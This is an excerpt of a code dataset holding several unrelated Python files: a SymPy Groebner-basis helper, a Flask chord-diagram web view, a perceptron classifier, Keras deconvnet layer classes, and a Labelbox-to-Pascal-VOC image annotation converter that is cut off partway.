pass\r\n else:\r\n Q, r = _Q, _r\r\n\r\n if not opt.polys:\r\n return [q.as_expr() for q in Q], r.as_expr()\r\n else:\r\n return Q, r\r\n\r\n\r\n def contains(self, poly):\r\n \"\"\"\r\n Check if ``poly`` belongs the ideal generated by ``self``.\r\n\r\n Examples\r\n ========\r\n\r\n >>> from sympy import groebner\r\n >>> from sympy.abc import x, y\r\n\r\n >>> f = 2*x**3 + y**3 + 3*y\r\n >>> G = groebner([x**2 + y**2 - 1, x*y - 2])\r\n\r\n >>> G.contains(f)\r\n True\r\n >>> G.contains(f + 1)\r\n False\r\n\r\n \"\"\"\r\n return self.reduce(poly)[1] == 0\r\n\r\ndef iter_groebner(seq,n, ring, method=None):\r\n \"\"\"\r\n Computes Groebner basis for a set of polynomials in `K[X]`.\r\n\r\n Wrapper around the (default) improved Buchberger and the other algorithms\r\n for computing Groebner bases. The choice of algorithm can be changed via\r\n ``method`` argument or :func:`setup` from :mod:`sympy.polys.polyconfig`,\r\n where ``method`` can be either ``buchberger`` or ``f5b``.\r\n\r\n \"\"\"\r\n\r\n domain, orig = ring.domain, None\r\n if not domain.is_Field or not domain.has_assoc_Field:\r\n try:\r\n orig, ring = ring, ring.clone(domain=domain.get_field())\r\n except DomainError:\r\n raise DomainError(\"can't compute a Groebner basis over %s\" % domain)\r\n else:\r\n seq = [ s.set_ring(ring) for s in seq ]\r\n\r\n G = _incr_buch(seq,n, ring)\r\n\r\n if orig is not None:\r\n G = [ g.clear_denoms()[1].set_ring(orig) for g in G ]\r\n\r\n return G\r\n\r\ndef _incr_buch(f,n, ring):\r\n \"\"\"\r\n Incremental Computation of a reduced Grobner basis, given that f[:-1] is a reduced Grobner basis\r\n and f[-1] is a new polynomial to add into the basis.\r\n New polynomial f[-1] is assumed to be reduced by the grobner basis f[:-1] already.\r\n\r\n \"\"\"\r\n order = ring.order\r\n domain = ring.domain\r\n\r\n monomial_mul = ring.monomial_mul\r\n monomial_div = ring.monomial_div\r\n monomial_lcm = ring.monomial_lcm\r\n\r\n def select(P):\r\n # normal selection strategy\r\n # select the pair with minimum LCM(LM(f), LM(g))\r\n pr = min(P, key=lambda pair: order(monomial_lcm(f[pair[0]].LM, f[pair[1]].LM)))\r\n return pr\r\n\r\n def normal(g, J):\r\n h = g.rem([ f[j] for j in J ])\r\n\r\n if not h:\r\n return None\r\n else:\r\n h = h.monic()\r\n\r\n if not h in I:\r\n I[h] = len(f)\r\n f.append(h)\r\n\r\n return h.LM, I[h]\r\n\r\n def update(G, B, ih):\r\n # update G using the set of critical pairs B and h\r\n # [BW] page 230\r\n h = f[ih]\r\n mh = h.LM\r\n\r\n # filter new pairs (h, g), g in G\r\n C = G.copy()\r\n D = set()\r\n\r\n while C:\r\n # select a pair (h, g) by popping an element from C\r\n ig = C.pop()\r\n g = f[ig]\r\n mg = g.LM\r\n LCMhg = monomial_lcm(mh, mg)\r\n\r\n def lcm_divides(ip):\r\n # LCM(LM(h), LM(p)) divides LCM(LM(h), LM(g))\r\n m = monomial_lcm(mh, f[ip].LM)\r\n return monomial_div(LCMhg, m)\r\n\r\n # HT(h) and HT(g) disjoint: mh*mg == LCMhg\r\n if monomial_mul(mh, mg) == LCMhg or (\r\n not any(lcm_divides(ipx) for ipx in C) and\r\n not any(lcm_divides(pr[1]) for pr in D)):\r\n D.add((ih, ig))\r\n\r\n E = set()\r\n\r\n while D:\r\n # select h, g from D (h the same as above)\r\n ih, ig = D.pop()\r\n mg = f[ig].LM\r\n LCMhg = monomial_lcm(mh, mg)\r\n\r\n if not monomial_mul(mh, mg) == LCMhg:\r\n E.add((ih, ig))\r\n\r\n # filter old pairs\r\n B_new = set()\r\n\r\n while B:\r\n # select g1, g2 from B (-> CP)\r\n ig1, ig2 = B.pop()\r\n mg1 = f[ig1].LM\r\n mg2 = f[ig2].LM\r\n LCM12 = monomial_lcm(mg1, mg2)\r\n\r\n # if HT(h) does not divide lcm(HT(g1), HT(g2))\r\n if not monomial_div(LCM12, mh) or \\\r\n monomial_lcm(mg1, mh) == LCM12 or \\\r\n monomial_lcm(mg2, mh) == LCM12:\r\n B_new.add((ig1, ig2))\r\n\r\n B_new |= E\r\n\r\n # filter polynomials\r\n G_new = set()\r\n\r\n while G:\r\n ig = G.pop()\r\n mg = f[ig].LM\r\n\r\n if not monomial_div(mg, mh):\r\n G_new.add(ig)\r\n\r\n G_new.add(ih)\r\n\r\n return G_new, B_new\r\n # end of update ################################\r\n\r\n if not f:\r\n return []\r\n f1 = [func for func in f[:-n]]\r\n for p in f[-n:]:\r\n r = p.rem(f1)\r\n if r != 0:\r\n f1.append(r)\r\n f = f1\r\n I = {} # ip = I[p]; p = f[ip]\r\n F = set()\r\n G = set() # set of indices of intermediate would-be Groebner basis\r\n CP = set() # set of pairs of indices of critical pairs\r\n\r\n for i, h in enumerate(f):\r\n I[h] = i #Setup polynomial-index dictionary\r\n if i >= len(f)-n:\r\n F.add(i)\r\n else:\r\n G.add(i)\r\n \r\n #####################################\r\n # algorithm GROEBNERNEWS2 in [BW] page 232\r\n while F:\r\n # select p with minimum monomial according to the monomial ordering\r\n h = min([f[x] for x in F], key=lambda f: order(f.LM))\r\n ih = I[h]\r\n F.remove(ih)\r\n G, CP = update(G, CP, ih)\r\n\r\n # count the number of critical pairs which reduce to zero\r\n reductions_to_zero = 0\r\n\r\n while CP:\r\n ig1, ig2 = select(CP)\r\n CP.remove((ig1, ig2))\r\n \r\n h = spoly(f[ig1], f[ig2], ring)\r\n # ordering divisors is on average more efficient [Cox] page 111\r\n G1 = sorted(G, key=lambda g: order(f[g].LM))\r\n ht = normal(h, G1)\r\n\r\n if ht:\r\n G, CP = update(G, CP, ht[1])\r\n else:\r\n reductions_to_zero += 1\r\n\r\n ######################################\r\n # now G is a Groebner basis; reduce it\r\n Gr = set()\r\n\r\n for ig in G:\r\n ht = normal(f[ig], G - set([ig]))\r\n\r\n if ht:\r\n Gr.add(ht[1])\r\n\r\n Gr = [f[ig] for ig in Gr]\r\n\r\n # order according to the monomial ordering\r\n Gr = sorted(Gr, key=lambda f: order(f.LM), reverse=True)\r\n\r\n return Gr\r\n\r\nimport numpy as np\r\nfrom math import floor\r\nimport time\r\nfrom itertools import product\r\nfrom itertools import combinations\r\nfrom sympy import Matrix, var\r\n\r\ndef make_linearEqns(A,z):\r\n #Takes matrix A and variable list z and converts it into a list of linear equations\r\n zmat = Matrix(z)\r\n A = Matrix(A)\r\n A = A.rref()[0]\r\n lin_fcns = A*zmat\r\n lin_fcns = [f for f in lin_fcns if f != 0]\r\n lin_fcns = lin_fcns[::-1]\r\n return(list(lin_fcns))\r\n\r\ndef hypercube_matrix(R):\r\n A = np.zeros((len(R),len(R[0])))\r\n for i,r in enumerate(R):\r\n for j,letter in enumerate(r):\r\n if letter == '0':\r\n A[i,j] = -1\r\n else:\r\n A[i,j] = int(letter)\r\n return(A)\r\n\r\ndef hypercube_polys(k):\r\n variable_string = ''\r\n num_digits = len(str(k))\r\n for i in range(0,k):\r\n count = str(i+1).zfill(num_digits)\r\n variable = ',z'+count\r\n variable_string = variable_string +variable\r\n variable_string = variable_string[1:]\r\n z = var(variable_string)\r\n P = []\r\n f = 0\r\n for i in range(k):\r\n P.append(z[i]*(z[i]-1)*(z[i]+1))\r\n f = f + z[i]**2\r\n fs = []\r\n for i in range(floor(k/2)):\r\n fi = f-2*(i+1)\r\n fs.append(fi)\r\n return(P,fs,z)\r\n\r\ndef check_hcube_resolving(R,k):\r\n #Create matrix A from R\r\n A = hypercube_matrix(R)\r\n #Get pre-computed Groebner basis and variables for H_k,2\r\n G,fs,z = hypercube_polys(k)\r\n #Get linear functions from A matrix\r\n lin_fcns = make_linearEqns(A,z)\r\n n = len(lin_fcns)\r\n #Get Grobner basis of P and linear functions\r\n G = groebnerbasis(True,G+lin_fcns,n,order = 'lex')\r\n for i,fi in enumerate(fs):\r\n #Compute Grobner basis of G+fi\r\n Gi = groebnerbasis(True,list(G)+[fi],1,order = 'lex')\r\n #Solutions iff Gi neq 1, if Gi neq 1 then R is not resolving\r\n if not (list(Gi) == [1]):\r\n return False\r\n return True","sub_path":"Lucas/Generate Resolving Sets/helper_funcs.py","file_name":"helper_funcs.py","file_ext":"py","file_size_in_byte":17829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"216736607","text":"from flask import (\n render_template,\n request,\n Blueprint,\n make_response\n )\n\nfrom diagram import MultiFingerChord\nfrom .forms import ChordForm, DownloadForm\n\nimport cairosvg\nfrom wand.image import Image\n\nimport yaml\n\nfrom .config import DEFAULT_STYLE\n\nmy_view = Blueprint('my_view', __name__)\n\n@my_view.route('/', methods=['GET', 'POST'])\ndef home():\n def create_diagram(chord_form):\n \"\"\"Create chord diagram and return filename.\"\"\"\n extras = [\n dict(\n zip(['string', 'fret', 'finger'], x.split(',')[:3])\n )\n for x in chord_form.extras.data.splitlines()\n ]\n\n chord_style = DEFAULT_STYLE\n\n chord_style['drawing']['label_all_frets'] = chord_form.label_all.data\n print(chord_style)\n\n\n diagram = MultiFingerChord(\n positions=chord_form.positions.data,\n fingers=chord_form.fingers.data,\n barre=chord_form.barre.data,\n title=chord_form.title.data,\n style=chord_style,\n extras=extras\n )\n\n # This is obviously dumb, but works for now\n filename = 'static/ukulele/{title}_{pos}_{fin}_{bar}.svg'.format(\n title=chord_form.title.data,\n pos=chord_form.positions.data,\n fin=chord_form.fingers.data,\n bar=chord_form.barre.data,\n )\n diagram.save(filename)\n\n return filename\n\n chord_form = ChordForm(request.form)\n dl_form = DownloadForm(request.form)\n\n if request.method == 'POST':\n # Diagram\n if chord_form.validate_on_submit():\n return render_template(\n 'index.html',\n diagram=create_diagram(chord_form),\n chord_form=chord_form,\n dl_form=dl_form\n )\n\n return render_template(\n 'index.html',\n diagram=create_diagram(chord_form),\n chord_form=chord_form,\n dl_form=dl_form\n )\n\n@my_view.route('/download', methods=['POST'])\ndef download_as():\n if request.method == 'POST':\n if format == 'png_t':\n # convert using cairosvg\n result = cairosvg.svg2png(imgdata)\n elif format == 'png':\n i = wand.image.Image(blob=imgdata)\n result = i.convert('png').make_blob()\n else:\n result = imgdata\n\n return send_file(io.BytesIO(imgdata), as_attachment=True, filename='chord.svg')\n\n@my_view.route('/api/v1/chord/', methods=['POST'])\ndef generate_chord():\n \"\"\"\n process the request body and return SVG content (no XML header)\n \"\"\"\n content = request.get_json(silent=True)\n chordobj = MultiFingerChord(\n positions=content.get('positions', '0000'),\n fingers=content.get('fingers','----'),\n barre=content.get('barre', None),\n title=content.get('title', 'Am7'),\n extras=content.get('extras', None),\n style=chord_style\n ).render()\n chordobj.seek(0)\n header, data = chordobj.read().splitlines()\n\n # export type\n fmt = content.get('format', 'svg')\n\n if fmt != 'svg':\n content_type = 'image/png'\n ext = 'png'\n else:\n content_type = 'image/svg+xml'\n ext = 'svg'\n\n # OK, we have a chord object, let's return it\n if fmt == 'png_t':\n # do cairo stuff\n data = cairosvg.svg2png(bytestring=data.encode('utf-8'))\n\n if fmt == 'png':\n with Image(blob=data.encode('utf-8')) as i:\n data = i.convert('png').make_blob()\n\n response = make_response(data)\n response.headers.set('Content-Type', content_type)\n response.headers.set('Content-Disposition', 'attachment', filename=\"{}.{}\".format(content.get('title'), ext))\n\n return response\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"183406928","text":"import argparse\nimport pprint\nimport numpy as np\nfrom nbc import read_data, zero_one_loss\nimport crossv\nimport matplotlib.pyplot as plt\nimport pylab\n\ndef define_attr(data):\n\tattr = data[0][1:]\n\tnum_rows = len(data)\n\tnum_attr = len(attr)\n\tattr_value_dict = {}\n\n\tfor i in range(num_attr):\n\t\tattr_values = [data[j][i + 1] for j in range(1,num_rows)]\n\t\tvalues = set(attr_values)\n\t\tattr_value_dict[attr[i]] = dict([(key, value) for value, key in enumerate(values, 1)])\n\n\treturn attr_value_dict\n\ndef transform_data(data, value_dict):\n\tattr = data[0][1:]\n\tnum_rows = len(data)\n\tnum_attr = len(attr)\n\n\tfor i in range(1,num_rows):\n\t\tdata[i][0] = 0 if data[i][0] == '0' else 1\n\t\tfor j in range(num_attr):\n\t\t\t'''try:\n\t\t\t\tdata[i][j] = float(data[i][j].strip())\n\t\t\texcept Exception as e:'''\n\t\t\tdata[i][j + 1] = value_dict[attr[j]][data[i][j + 1]]\n\n\treturn data\n\ndef predict(data, weights, bias):\n\t# data = np.array(data)\n\t# print data\n\tprediction = []\n\tproduct = data.dot(weights)\n\t# print product\n\t#prediction = 1 if product > -1*bias else 0\n\tfor i in np.nditer(product):\n\t\tprediction.append(1 if i > -1*bias else 0)\n\treturn prediction\n\ndef training(train_data, true_class, alpha, T):\n\tnum_attr = len(train_data[0])\n\tweights = np.zeros(num_attr)\n\tbias = 0\n\t\n\tfor e in range(T):\n\t\twrong = 0\n\t\tfor row_num in range(train_data.shape[0]):\n\t\t\t#print \"initial weights:\", weights\n\t\t\tprediction = predict(train_data[row_num], weights, bias)\n\t\t\t# print prediction\n\t\t\t# print true_class[row_num]\n\t\t\tif prediction[0] != true_class[row_num]:\n\t\t\t\t# bias += alpha * error\n\t\t\t\twrong += 1\n\t\t\t\tchange = np.multiply(alpha * (true_class[row_num]-prediction[0]), train_data[row_num])\n\t\t\t\t# print change\n\t\t\t\tweights = np.add(weights, change)\n\t\t\t\tbias += alpha * (true_class[row_num]-prediction[0])\n\t\t\t# prediction = predict(train_data[row_num], weights, bias)\n\t\t\t# print prediction, \"\\n\"\n\t\t\t#print \"updated weights:\", weights\n\t\t# print \"error rate\", float(wrong)/train_data.shape[0]\n\treturn weights\n\ndef make_matrix(train_data):\n\tvalue_dict = define_attr(train_data)\n\ttrans_data = transform_data(train_data, value_dict)\n\ttrans_data.pop(0)\n\ttrue_class = [data_row.pop(0) for data_row in trans_data]\n\n\tdata_mat = np.array(trans_data)\n\treturn data_mat, true_class\n\n\ndef extract_weights(train_data):\n\tdata_mat, true_class = make_matrix(train_data)\n\t#predict(data_mat, None, None)\n\n\treturn training(data_mat, true_class, 0.5, 100)\n\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"datafile\", help=\"data file (yelp2.csv)\", default=None)\n\targs = parser.parse_args()\n\n\tif args.datafile == None: raise Exception(\"The data file is not found\")\n\n\t# train_data = read_data(args.training)\n\n\t# extract_weights(train_data)\n\n\ttraining_set, test_set = crossv.split_data(args.datafile)\n\tresult = crossv.validation(training_set, test_set)\n\n\tresult_p = crossv.validation(training_set, test_set, \"perceptron\")\n\n # pprint.pprint(result)\n\tx_axis = result.keys()\n\tx_axis.sort()\n\n\tzero_one_nbc = []\n\n\tzero_one_perceptron = []\n # square_perceptron = []\n\n\tbaseline = []\n\n\tfor index in x_axis:\n\t\tzero_one_nbc.append(result[index][0])\n\t\tbaseline.append(result[index][2])\n\t\tzero_one_perceptron.append(result_p[index])\n\tpylab.plot(x_axis, zero_one_nbc, label=\"nbc\")\n\tpylab.plot(x_axis, zero_one_perceptron, label=\"perceptron\")\n\tpylab.plot(x_axis, baseline, label=\"baseline\")\n\tpylab.legend(loc='upper left')\n\tpylab.show()\n\t# value_dict = define_attr(train_data)\n\t# trans_data = transform_data(train_data, value_dict)\n\t# trans_data.pop(0)\n\t# true_class = [data_row.pop(0) for data_row in trans_data]\n\n\t# data_mat = np.array(trans_data)\n\t# #predict(data_mat, None, None)\n\n\t# weights = training(data_mat, true_class, 2, 1000)\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"hw3/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"614642459","text":"import numpy as np\n\nfrom keras.layers import (\n Input,\n Dense)\nfrom keras.layers.convolutional import (\n Convolution2D)\nfrom keras import backend as K\n\n\nclass DLayer:\n def __init__(self, layer):\n self.layer = layer\n self.up_data = None\n self.down_data = None\n self.up_func = None\n self.down_func = None\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to compute activation in forward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Activation\n \"\"\"\n data = self.up_func([data, learning_phase])\n self.up_data = data if K.backend() == 'theano' else data[0]\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to compute activation in backward pass\n # Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Activation\n \"\"\"\n data = self.down_func([data, learning_phase])\n self.down_data = data if K.backend() == 'theano' else data[0]\n return self.down_data\n\n\nclass DConvolution2D(DLayer):\n \"\"\"\n A class to define forward and backward operation on Convolution2D\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Convolution2D layer, whose configuration\n will be used to initiate DConvolution2D(input_shape,\n output_shape, weights)\n \"\"\"\n super(DConvolution2D, self).__init__(layer)\n\n weights = layer.get_weights()\n W = weights[0]\n b = weights[1]\n\n # Set up_func for DConvolution2D\n input = Input(shape=layer.input_shape[1:])\n\n output = Convolution2D(\n nb_filter=layer.nb_filter,\n nb_row=layer.nb_row,\n nb_col=layer.nb_col,\n border_mode=layer.border_mode,\n weights=[W, b]\n )(input)\n self.up_func = _K_function([input, K.learning_phase()], output)\n\n # Flip W horizontally and vertically,\n # and set down_func for DConvolution2D\n if K.image_dim_ordering() == 'th':\n W = np.transpose(W, (1, 0, 2, 3))\n W = W[:, :, ::-1, ::-1]\n nb_down_filter = W.shape[0]\n nb_down_row = W.shape[2]\n nb_down_col = W.shape[3]\n else:\n W = np.transpose(W, (0, 1, 3, 2))\n W = W[::-1, ::-1, :, :]\n nb_down_filter = W.shape[3]\n nb_down_row = W.shape[0]\n nb_down_col = W.shape[1]\n b = np.zeros(nb_down_filter)\n input = Input(shape=layer.output_shape[1:])\n output = Convolution2D(\n nb_filter=nb_down_filter,\n nb_row=nb_down_row,\n nb_col=nb_down_col,\n border_mode='same',\n weights=[W, b]\n )(input)\n self.down_func = _K_function([input, K.learning_phase()], output)\n\n\nclass DDense(DLayer):\n \"\"\"\n A class to define forward and backward operation on Dense\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Dense layer, whose configuration\n will be used to initiate DDense(input_shape,\n output_shape, weights)\n \"\"\"\n super(DDense, self).__init__(layer)\n weights = layer.get_weights()\n W = weights[0]\n b = weights[1]\n\n # Set up_func for DDense\n input = Input(shape=layer.input_shape[1:])\n output = Dense(output_dim=layer.output_shape[1],\n weights=[W, b])(input)\n self.up_func = _K_function([input, K.learning_phase()], output)\n\n # Transpose W and set down_func for DDense\n W = W.transpose()\n self.input_shape = layer.input_shape\n self.output_shape = layer.output_shape\n b = np.zeros(self.input_shape[1])\n flipped_weights = [W, b]\n input = Input(shape=self.output_shape[1:])\n output = Dense(\n output_dim=self.input_shape[1],\n weights=flipped_weights)(input)\n self.down_func = _K_function([input, K.learning_phase()], output)\n\n\nclass DPooling(DLayer):\n \"\"\"\n A class to define forward and backward operation on Pooling\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Pooling layer, whose configuration\n will be used to initiate DPooling(input_shape,\n output_shape, weights)\n \"\"\"\n super(DPooling, self).__init__(layer)\n self.poolsize = layer.pool_size\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to compute pooling output in forward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Pooled result\n \"\"\"\n [self.up_data, self.switch] = \\\n self.__max_pooling_with_switch(data, self.poolsize)\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to compute unpooling output in backward pass\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Unpooled result\n \"\"\"\n self.down_data = self.__max_unpooling_with_switch(data, self.switch)\n return self.down_data\n\n def __max_pooling_with_switch(self, input, poolsize):\n \"\"\"\n Compute pooling output and switch in forward pass, switch stores\n location of the maximum value in each poolsize * poolsize block\n # Arguments\n input: data to be pooled\n poolsize: size of pooling operation\n # Returns\n Pooled result and Switch\n \"\"\"\n switch = np.zeros(input.shape)\n\n if K.image_dim_ordering() == 'th':\n samples, dims, rows, cols = input.shape\n else:\n samples, rows, cols, dims = input.shape\n\n row_poolsize = int(poolsize[0])\n col_poolsize = int(poolsize[1])\n rows = rows // row_poolsize\n cols = cols // col_poolsize\n\n if K.image_dim_ordering() == 'th':\n out_shape = samples, dims, rows, cols\n else:\n out_shape = samples, rows, cols, dims\n\n pooled = np.zeros(out_shape)\n\n for sample in range(samples):\n for dim in range(dims):\n for row in range(rows):\n for col in range(cols):\n if K.image_dim_ordering() == 'th':\n patch = input[sample,\n dim,\n row * row_poolsize: (row + 1) * row_poolsize,\n col * col_poolsize: (col + 1) * col_poolsize]\n max_value = patch.max()\n pooled[sample, dim, row, col] = max_value\n else:\n patch = input[sample,\n row * row_poolsize: (row + 1) * row_poolsize,\n col * col_poolsize: (col + 1) * col_poolsize,\n dim]\n max_value = patch.max()\n pooled[sample, row, col, dim] = max_value\n\n max_col_index = patch.argmax(axis=1)\n max_cols = patch.max(axis=1)\n max_row = max_cols.argmax()\n max_col = max_col_index[max_row]\n if K.image_dim_ordering() == 'th':\n switch[sample,\n dim,\n row * row_poolsize + max_row,\n col * col_poolsize + max_col] = 1\n else:\n switch[sample,\n row * row_poolsize + max_row,\n col * col_poolsize + max_col,\n dim] = 1\n\n return [pooled, switch]\n\n # Compute unpooled output using pooled data and switch\n def __max_unpooling_with_switch(self, input, switch):\n \"\"\"\n Compute unpooled output using pooled data and switch\n # Arguments\n input: data to be pooled\n poolsize: size of pooling operation\n switch: switch storing location of each elements\n # Returns\n Unpooled result\n \"\"\"\n if K.image_dim_ordering() == 'th':\n row_i, col_i = 2, 3\n else:\n row_i, col_i = 1, 2\n\n tile = np.ones((switch.shape[row_i] // input.shape[row_i],\n switch.shape[col_i] // input.shape[col_i]))\n\n if K.image_dim_ordering() == 'th':\n out = np.kron(input, tile)\n else:\n out = np.kron(np.transpose(input, (0, 3, 1, 2)), tile)\n out = np.transpose(out, (0, 2, 3, 1))\n\n unpooled = out * switch\n return unpooled\n\n\nclass DActivation(DLayer):\n \"\"\"\n A class to define forward and backward operation on Activation\n \"\"\"\n\n def __init__(self, layer, linear=False):\n \"\"\"\n # Arguments\n layer: an instance of Activation layer, whose configuration\n will be used to initiate DActivation(input_shape,\n output_shape, weights)\n \"\"\"\n super(DActivation, self).__init__(layer)\n self.linear = linear\n self.activation = layer.activation\n input = K.placeholder(shape=layer.output_shape)\n\n output = self.activation(input)\n # According to the original paper,\n # In forward pass and backward pass, do the same activation(relu)\n self.up_func = _K_function(\n [input, K.learning_phase()], output)\n self.down_func = _K_function(\n [input, K.learning_phase()], output)\n\n\nclass DFlatten(DLayer):\n \"\"\"\n A class to define forward and backward operation on Flatten\n \"\"\"\n\n def __init__(self, layer):\n \"\"\"\n # Arguments\n layer: an instance of Flatten layer, whose configuration\n will be used to initiate DFlatten(input_shape,\n output_shape, weights)\n \"\"\"\n super(DFlatten, self).__init__(layer)\n self.shape = layer.input_shape[1:]\n self.up_func = _K_function(\n [layer.input, K.learning_phase()], layer.output)\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to unflatten input in backward pass\n # Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n Recovered data\n \"\"\"\n new_shape = [data.shape[0]] + list(self.shape)\n assert np.prod(self.shape) == np.prod(data.shape[1:])\n self.down_data = np.reshape(data, new_shape)\n return self.down_data\n\n\nclass DInput(DLayer):\n \"\"\"\n A class to define forward and backward operation on Input\n \"\"\"\n\n def up(self, data, learning_phase=0):\n \"\"\"\n function to operate input in forward pass, the input and output\n are the same\n # Arguments\n data: Data to be operated in forward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n data\n \"\"\"\n self.up_data = data\n return self.up_data\n\n def down(self, data, learning_phase=0):\n \"\"\"\n function to operate input in backward pass, the input and output\n are the same\n # Arguments\n data: Data to be operated in backward pass\n learning_phase: learning_phase of Keras, 1 or 0\n # Returns\n data\n \"\"\"\n self.down_data = data\n return self.down_data\n\n\ndef _K_function(inputs, out):\n if K.backend() == 'theano' or isinstance(out, (list, tuple)):\n return K.function(inputs, out)\n else:\n return K.function(inputs, [out])","sub_path":"deconvnet/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":12265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610267052","text":"import Augmentor\nimport os\nimport json\nimport requests\nimport cv2\nimport datetime as dt\nimport numpy as np\nfrom PIL import Image\nfrom shapely import wkt\nfrom pascal_voc_writer import Writer as PascalWriter\n\nfrom .generator.pascal_voc import PascalVOCGenerator\n\n\nclass LabeledImagePascalVOC:\n \"\"\" Custom class matching returned json object of labelbox.io. \"\"\"\n\n ANNOTATION_PASCAL_VOC = 'Pascal VOC'\n SKIPPED_LABEL = 'Skip'\n\n def __init__(self, logger, *args, **kwargs):\n self._logger = logger(__name__)\n self._id = kwargs['ID']\n self._source_img_url = kwargs['Labeled Data']\n self._created_by = kwargs['Created By']\n self._project_name = kwargs['Project Name']\n self._seconds_to_label = kwargs['Seconds to Label']\n self._images_dir = kwargs['Images Dir']\n self._resized_image_dir = kwargs['Resized Image Dir']\n self._annotations_dir = kwargs['Annotations Dir']\n self._required_img_height = kwargs['Required Image Height']\n self._required_img_width = kwargs['Required Image Width']\n self.label_names = set()\n self._file_name = self._source_img_url.rsplit('/', 1)[-1].split('.')[0]\n self._file_ext = '.' + \\\n self._source_img_url.split(\"/\")[-1].split('.')[1]\n self._download_image(kwargs['Label'])\n self._resize_image(self._image_file_path)\n self._generate_pascal_voc_file(logger, kwargs['Label'], apply_reduction=True, debug=True)\n\n def _download_image(self, json_labels):\n \"\"\" Download image from provided link (Cloud link).\"\"\"\n file_name = self._file_name + self._file_ext\n self._image_file_path = os.path.join(self._images_dir, file_name)\n\n if not os.path.exists(self._image_file_path):\n try:\n response = requests.get(self._source_img_url, stream=True)\n response.raw.decode_content = True\n image = Image.open(response.raw)\n self._img_width, self._img_height = image.size\n image.save(self._image_file_path, format=image.format)\n self._logger.info('Downloaded image form source {} at {}'.format(\n self._source_img_url, self._image_file_path))\n\n except requests.exceptions.MissingSchema as e:\n self._logger.exception(\n '\"source_image_url\" attribute must be a URL.')\n except requests.exceptions.ConnectionError as e:\n self._logger.exception(\n 'Failed to fetch image from {}'.format(self._source_img_url))\n else:\n image = Image.open(self._image_file_path)\n self._img_width, self._img_height = image.size\n self._logger.warn('WARN: Skipping file download since it already exist @ {}\\n'.format(\n self._image_file_path))\n\n def _resize_image(self, image_path):\n file_name = self._file_name + self._file_ext\n self._resized_image_path = os.path.join(\n self._resized_image_dir, file_name)\n\n img = cv2.imread(image_path)\n\n height, width = img.shape[:2]\n\n self._aspect_ratio = float(width)/height\n\n scaled_height = 300\n scaled_width = 300\n\n # interpolation method\n if height > self._required_img_height or width > self._required_img_width: # shrinking image\n interp = cv2.INTER_AREA\n else: # stretching image\n interp = cv2.INTER_CUBIC\n\n # aspect ratio of image\n\n # compute scaling and pad sizing\n if self._aspect_ratio > 1: # horizontal image\n new_width = scaled_width\n new_height = np.round(new_width/self._aspect_ratio).astype(int)\n pad_vert = (scaled_height-new_height)/2\n self._pad_top, self._pad_bot = np.floor(\n pad_vert).astype(int), np.ceil(pad_vert).astype(int)\n self._pad_left, self._pad_right = 0, 0\n elif self._aspect_ratio < 1: # vertical image\n new_height = scaled_height\n new_width = np.round(new_height*self._aspect_ratio).astype(int)\n pad_horz = (scaled_width-new_width)/2\n self._pad_left, self._pad_right = np.floor(\n pad_horz).astype(int), np.ceil(pad_horz).astype(int)\n self._pad_top, self._pad_bot = 0, 0\n else: # square image\n new_height, new_width = scaled_height, scaled_width\n self._pad_left, self._pad_right, self._pad_top, self._pad_bot = 0, 0, 0, 0\n\n # factors to scale bounding box values\n self._x_factor = float(width) / self._required_img_width\n self._y_factor = float(height) / (self._required_img_height - self._pad_bot - self._pad_top)\n\n # set pad color\n # color image but only one color provided\n if len(img.shape) is 3 and not isinstance(0, (list, tuple, np.ndarray)):\n padColor = [0]*3\n\n # scale and pad\n scaled_img = cv2.resize(img, (new_width, new_height), interpolation=interp)\n scaled_img = cv2.copyMakeBorder(\n scaled_img, self._pad_top, self._pad_bot, self._pad_left, self._pad_right, borderType=cv2.BORDER_CONSTANT, value=0)\n\n if not os.path.exists(self._resized_image_path):\n cv2.imwrite(self._resized_image_path, scaled_img)\n self._logger.info('Resized image at {}.jpg'.format(\n self._resized_image_path))\n else:\n self._logger.warn('WARN: Skipping file resizing since it already exist @ {}\\n'.format(\n self._resized_image_path))\n\n def _generate_pascal_voc_file(self, logger, json_labels, apply_reduction=False, debug=False):\n \"\"\" Transform WKT polygon to pascal voc. \"\"\"\n config = {\n 'labelbox_id': self._id,\n 'project_name': self._project_name,\n 'json_labels': json_labels,\n 'annotation_dir': self._annotations_dir,\n 'apply_reduction': apply_reduction,\n 'debug': debug\n }\n\n if apply_reduction:\n config.update({\n 'image_path': self._resized_image_path,\n 'image_width': self._required_img_width,\n 'image_height': self._required_img_height,\n 'x_factor': self._x_factor,\n 'y_factor': self._y_factor,\n 'pad_top': self._pad_top,\n 'pad_left': self._pad_left,\n })\n else:\n config.update({\n 'image_path': self._image_file_path,\n 'image_width': self._img_width,\n 'image_height': self._img_height,\n 